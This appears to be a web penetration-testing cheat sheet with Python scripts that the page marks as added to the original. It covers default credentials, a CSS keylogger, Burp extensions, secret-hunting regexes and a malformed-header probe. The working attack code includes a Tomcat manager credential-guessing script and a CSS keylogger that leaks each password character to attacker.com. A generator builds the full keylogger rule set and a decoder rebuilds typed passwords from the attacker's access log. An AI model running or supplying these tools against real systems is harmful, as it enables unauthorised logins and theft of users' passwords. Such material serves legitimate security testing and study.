Other
Default passwords
https://github.com/ihebski/DefaultCreds-cheat-sheet
https://www.routerpasswords.com/
https://cirt.net/passwords
https://default-password.info/
http://defaultpassword.us/
http://www.passwordsdatabase.com/
http://open-sez.me/
https://www.cleancss.com/router-default/
https://many-passwords.github.io/
#SCADA default passwords
https://www.hackers-arise.com/post/2016/09/21/Scada-Hacking-Default-Passwords-for-Nearly-Every-SCADA-System
Cheat-sheet
https://github.com/ihebski/DefaultCreds-cheat-sheet
Apache Tomcat
admin : admin
ADMIN : ADMIN
admin : j5Brn9
admin : None
admin : tomcat
cxsdk : kdsxc
j2deployer : j2deployer
ovwebusr : OvW*busr1
QCC : QLogic66
role : changethis
role1 : role1
role1 : tomcat
root : root
tomcat : changethis
tomcat : s3cret
tomcat : tomcat
xampp : xampp
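The list above is only useful if it can be thrown at a target quickly. The following Python script is an added example, not code from the original page: it parses the "user : password" lines above and tries each pair with HTTP Basic auth against the Tomcat manager application. The target host, the /manager/html path and the treatment of "None" as a possibly empty password are assumptions.

```python
"""Try the default Tomcat credentials above against /manager/html.

Added example, not from the original page. Hostname and path are assumptions.
"""
import base64
import urllib.error
import urllib.request

# Constructed from the list above; each "user : pass" line becomes a tuple.
TOMCAT_DEFAULTS = """admin : admin
ADMIN : ADMIN
admin : j5Brn9
admin : None
admin : tomcat
cxsdk : kdsxc
j2deployer : j2deployer
ovwebusr : OvW*busr1
QCC : QLogic66
role : changethis
role1 : role1
role1 : tomcat
root : root
tomcat : changethis
tomcat : s3cret
tomcat : tomcat
xampp : xampp"""


def parse_creds(text):
    """Parse 'user : password' lines; split on the first ' : ' only so a
    password containing ':' or '*' survives intact."""
    pairs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or " : " not in line:
            continue
        user, password = line.split(" : ", 1)
        pairs.append((user, password))
        # Assumption: 'None' in the cheat sheet may stand for an empty
        # password, so try the blank variant as well as the literal string.
        if password == "None":
            pairs.append((user, ""))
    return pairs


def basic_auth_header(user, password):
    """Build the HTTP Basic Authorization value the Tomcat manager expects."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def try_tomcat_manager(base_url, creds, path="/manager/html", timeout=5):
    """Return the first (user, password) that gets a 200 from the manager app.

    The manager answers 401 to bad credentials and 403 to a valid user that
    lacks the manager-gui role, so only a 200 counts as a hit.
    """
    for user, password in creds:
        req = urllib.request.Request(base_url.rstrip("/") + path)
        req.add_header("Authorization", basic_auth_header(user, password))
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                if resp.status == 200:
                    return user, password
        except urllib.error.HTTPError as err:
            if err.code not in (401, 403):
                print(f"unexpected {err.code} for {user}:{password}")
        except urllib.error.URLError as err:
            print(f"connection failed: {err.reason}")
            return None
    return None


if __name__ == "__main__":
    # Assumed target; replace with a host you are authorised to test.
    hit = try_tomcat_manager("http://127.0.0.1:8080", parse_creds(TOMCAT_DEFAULTS))
    print("valid credentials:", hit)
```

A 403 is worth noting separately from a 401: it means the credentials are valid but the account lacks the manager-gui role, which still confirms a default account exists.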
CSS keylogger
<style>
input[type="password"][value$="a"] {
  background-image: url("http://attacker.com/a");
}
</style>
The selector matches when the password field's value attribute ends with "a" and makes the browser fetch a URL that leaks that character, so one rule is needed per character of the expected charset. It only works when the application mirrors what is typed into the value attribute (frameworks such as React do this for controlled inputs); a plain input updates only the DOM value property, so the attribute selector never fires.
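To turn the single rule above into something usable, both the rule set and the decoding of the hits are needed. The Python below is an added example, not code from the original page: it generates one rule per character (escaping the characters that would break the CSS string or the URL) and reconstructs the typed sequence from the attacker's web-server access log. The attacker host, the /k/ path and the sample log lines are assumptions.

```python
"""Build the full rule set for the CSS keylogger above and decode the hits it
produces in the attacker's web-server log. Added example, not from the
original page; the /k/ path, attacker host and sample log are assumptions."""
import re
import string
from urllib.parse import quote, unquote

CHARSET = string.ascii_letters + string.digits + "!@#$%^&*()-_=+.,;:\"'\\ "


def css_escape(ch):
    """Escape a character for use inside a double-quoted CSS string."""
    return "\\" + ch if ch in ('"', "\\") else ch


def build_keylogger_css(base_url, charset=CHARSET):
    """One rule per character: when the password field's value attribute ends
    with that character, the browser requests base_url/<char> as a background
    image, and that request is the leak."""
    base = base_url.rstrip("/")
    rules = [
        'input[type="password"][value$="%s"] { background-image: url("%s/%s"); }'
        % (css_escape(ch), base, quote(ch, safe=""))
        for ch in charset
    ]
    return "\n".join(rules)


def reconstruct_from_log(log_lines, path="/k/"):
    """Recover keystrokes from access-log lines in arrival order. Each hit only
    reveals the last character typed, and the browser may not re-request a URL
    it has already fetched, so a character repeated later in the password can
    be lost."""
    hit = re.compile(r'"GET %s([^ ]+) HTTP/1\.[01]"' % re.escape(path))
    typed = []
    for line in log_lines:
        m = hit.search(line)
        if m:
            typed.append(unquote(m.group(1)))
    return "".join(typed)


# Constructed access-log lines for a victim typing "hunter2", with an
# unrelated request mixed in to show that only /k/ hits are decoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:%02d +0000] "GET /k/%s HTTP/1.1" 200 0 "-" "Mozilla/5.0"'
    % (i, c)
    for i, c in enumerate("hunter2")
]
SAMPLE_LOG.insert(
    3,
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /favicon.ico HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
)

if __name__ == "__main__":
    print(build_keylogger_css("http://attacker.com/k").splitlines()[0])
    print(reconstruct_from_log(SAMPLE_LOG))
```

The generated stylesheet has to be injected somewhere the victim's page loads it (a stored HTML/CSS injection, a compromised third-party stylesheet); the rules alone do nothing.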
Burp Extensions
Active Scan++
AutoRepeater
HTTP Request Smuggler
Backslash Powered Scanner
Collaborator Everywhere
Log4Shell Everywhere
JSON Beautifier
Sitemap Extractor
Param Miner
JSON Web Tokens
Java Deserialization Scanner
Web Cache Deception Scanner
Autorize
BurpJSLinkFinder
JS Miner
BurpBounty
domain_hunter
Turbo Intruder
Server-Side Prototype Pollution Scanner
Upload Scanner
IP Rotate
HUNT Scanner
Software Vulnerability Scanner
IIS Tilde
GraphQuail
Content Type Converter
NoWAFpls
APIKit (from API-Security)
Distribute Damage
Auth Analyzer
Regex for AutoRepeater
URL
https?://(www\.)?[-a-zA-Z0-9@:%._+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_+.~#?&/=]*)
Regex for filtering interesting requests in Burp's HTTP history (tick "Regex" in the filter's search term)
(?i)([a-z0-9]+){0,}((_|-){0,}(\s){0,})(key|pass|credentials|auth|cred|creds|secret|password|access|token|api)(\s){0,}(=|:|is|>){1,}
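Both regexes are easier to trust once run over sample data. The Python below is an added example, not code from the original page: it applies the URL regex to a constructed JavaScript file and the credential regex to constructed Burp history lines, and it shows that the credential regex's leading optional groups do not change what is matched, so a tighter form without the nested quantifier gives the same verdict while avoiding the heavy backtracking that long alphanumeric runs (minified JS, base64 blobs) cause.

```python
"""Apply the two regexes above to constructed sample data. Added example, not
from the original page; the sample JS and history lines are made up."""
import re

# URL regex from above.
URL_RE = re.compile(
    r"https?://(www\.)?[-a-zA-Z0-9@:%._+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b"
    r"([-a-zA-Z0-9()@:%_+.~#?&/=]*)"
)

# Credential regex from above, as written on the page.
SECRET_RE = re.compile(
    r"(?i)([a-z0-9]+){0,}((_|-){0,}(\s){0,})"
    r"(key|pass|credentials|auth|cred|creds|secret|password|access|token|api)"
    r"(\s){0,}(=|:|is|>){1,}"
)

# The leading groups can all match the empty string, so for a yes/no search
# the pattern reduces to "keyword, optional whitespace, one or more
# separators". This form avoids the nested quantifier ([a-z0-9]+){0,}.
SECRET_RE_TIGHT = re.compile(
    r"(?i)(key|pass|credentials|auth|cred|creds|secret|password|access|token|api)"
    r"\s*(=|:|is|>)+"
)


def extract_urls(text):
    """Return every absolute URL in text, in order of appearance."""
    return [m.group(0) for m in URL_RE.finditer(text)]


def filter_interesting(lines, pattern=SECRET_RE):
    """Keep the history lines the credential regex flags."""
    return [line for line in lines if pattern.search(line)]


def regexes_agree(lines):
    """True when the page's regex and the tightened one flag the same lines."""
    return filter_interesting(lines, SECRET_RE) == filter_interesting(lines, SECRET_RE_TIGHT)


# Constructed sample JavaScript; the relative path must not be extracted.
SAMPLE_JS = """
const api = "https://api.example.com/v1/users?id=1";
const debug = 'http://internal-host.local:8080/admin';
const rel = "/v1/health";
"""

# Constructed history lines: request line plus a fragment of headers or body.
SAMPLE_HISTORY = [
    "GET /static/app.js HTTP/1.1",
    "POST /login HTTP/1.1 password=hunter2&user=bob",
    "GET /v2/users?api_key=deadbeef HTTP/1.1",
    "GET /v2/me HTTP/1.1 X-Auth-Token: eyJhbGciOiJIUzI1NiJ9",
    "GET /images/logo.png HTTP/1.1",
]

if __name__ == "__main__":
    print(extract_urls(SAMPLE_JS))
    for line in filter_interesting(SAMPLE_HISTORY):
        print("interesting:", line)
```

The "is" separator is there to catch prose such as "the token is ..." in responses; expect some noise from it and from short keywords like "key" and "api".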
Information disclosure
Information disclosure through header manipulation: an Accept header whose quality parameter is malformed (p=0.01 where the syntax requires ;q=0.01) can make the server's content-negotiation code throw and return a verbose error (stack trace, framework name and version) instead of the normal response. Compare the reply with the one obtained for the well-formed header:
Accept: application/json, text/javascript, */*, p=0.01
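A single malformed request is only meaningful next to a baseline. The Python below is an added example, not code from the original page: it sends the well-formed and the malformed Accept header to the same URL and flags the probe when the status code changes or the body gains error markers that the baseline lacked. The target URL and the constructed sample responses are assumptions.

```python
"""Send the malformed Accept header above and compare the answer with a
baseline request. Added example, not from the original page; the target URL
and the sample responses are assumptions."""
import urllib.error
import urllib.request

BASELINE_ACCEPT = "application/json, text/javascript, */*; q=0.01"
MALFORMED_ACCEPT = "application/json, text/javascript, */*, p=0.01"

# Fragments that typically appear only in unhandled-error pages.
ERROR_MARKERS = (
    "Exception",
    "Traceback (most recent call last)",
    "Stack Trace",
    "at org.",
    "at com.",
    "at java.",
    "Whitelabel Error Page",
)


def fetch(url, accept, timeout=5):
    """Return (status, body) for a GET with the given Accept header; HTTP
    errors are returned rather than raised so a 500 body can be inspected."""
    req = urllib.request.Request(url, headers={"Accept": accept})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def error_markers(body):
    """Return the error markers present in a response body."""
    return [m for m in ERROR_MARKERS if m in body]


def classify(baseline, probe):
    """Compare two (status, body) pairs. The probe is interesting when it
    changes the status code or introduces markers absent from the baseline."""
    b_status, b_body = baseline
    p_status, p_body = probe
    new_markers = sorted(set(error_markers(p_body)) - set(error_markers(b_body)))
    return {
        "status_changed": b_status != p_status,
        "new_markers": new_markers,
        "interesting": b_status != p_status or bool(new_markers),
    }


def probe_accept_header(url):
    """Run both requests against url and classify the difference."""
    return classify(fetch(url, BASELINE_ACCEPT), fetch(url, MALFORMED_ACCEPT))


# Constructed responses standing in for a server that chokes on the header;
# the class and file names are made up.
SAMPLE_BASELINE = (200, '{"status":"ok"}')
SAMPLE_PROBE = (
    500,
    "java.lang.IllegalArgumentException: Invalid mime type\n"
    "\tat org.example.Negotiation.parse(Negotiation.java:42)",
)

if __name__ == "__main__":
    print(classify(SAMPLE_BASELINE, SAMPLE_PROBE))
    # Assumed target; run only against hosts you are authorised to test:
    # print(probe_accept_header("http://127.0.0.1:8080/api/me"))
```

A status change alone (200 to 500, or to 406) is already a finding worth a manual look even when the body carries no recognisable marker.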